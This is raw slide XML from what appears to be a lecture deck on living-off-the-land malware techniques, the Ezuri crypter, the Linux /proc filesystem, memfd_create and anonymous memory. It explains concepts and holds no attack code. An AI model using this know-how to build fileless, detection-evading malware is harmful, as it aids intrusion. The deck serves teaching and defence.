            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Return Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21766235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The term “living off the land” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>LOL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) was coined by malware researchers Christopher Campbell and Matt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Greaber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to explain the use of trusted, pre-installed system tools to spread malware. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>There are a few different types of LOL techniques, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LOLBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Windows binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to hide malicious activity; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LOLLibs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which use libraries; and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LOLScripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which use scripts.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What Is “Living off the Land?”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>        [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Yiftach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Keshet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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80</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6432567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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="338328"/>
            <a:ext cx="8640960" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Linux Malware Authors Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>Ezuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>Golang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>crypter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> for Zero Detection  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ax Sharma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600"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81</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30321799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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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82</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30584906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95536" y="2675467"/>
            <a:ext cx="8352927" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>文件系統中，每一個進程都有一個相應的文件 。下面是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄下的一些重要文件 ：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmdline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了用於開始進程的命令 ；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了當前進程工作目錄的一個鏈接 ；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/environ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了可用進程環境變量的列表 ；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了正在進程中運行的程序鏈接；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個目錄包含了進程打開的每一個文件的鏈接；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/mem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了進程在內存中的內容；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/stat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了進程的狀態信息；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>statm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了進程的內存使用信息。</a:t>
            </a:r>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83</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Subdirectory of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itread01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14208944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r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Related Functions</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84</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18098155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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Anonymous memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is used for all backing pages of the file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Therefore, files created by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memfd_create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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>have the same semantics as other anonymous memory allocations such as those allocated using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAP_ANONYMOUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Storage of an File Created by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memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>man7.org</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85</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28938678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0" y="2675466"/>
            <a:ext cx="8784975" cy="3849877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>anonymous memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>anonymous mappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> represent memory that is not backed by a filesystem. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Such mappings are implicitly created for program’s stack and heap or by explicit calls to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mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(2) system call. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Usually, the anonymous mappings only define virtual memory areas that the program is allowed to access. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The read accesses will result in creation of a page table entry that references a special physical page filled with zeroes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>When the program performs a write, a regular physical page will be allocated to hold the written data. The page will be marked dirty and if the kernel decides to repurpose it, the dirty page will be swapped out.</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86</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Anonymous Memory                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>kernel development community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33920112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8" y="2675467"/>
            <a:ext cx="8568951" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create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does not require a local mount-point. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It can create objects that are not associated with any filesystem and can never be linked into a filesystem. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The backing memory is anonymous memory as if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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
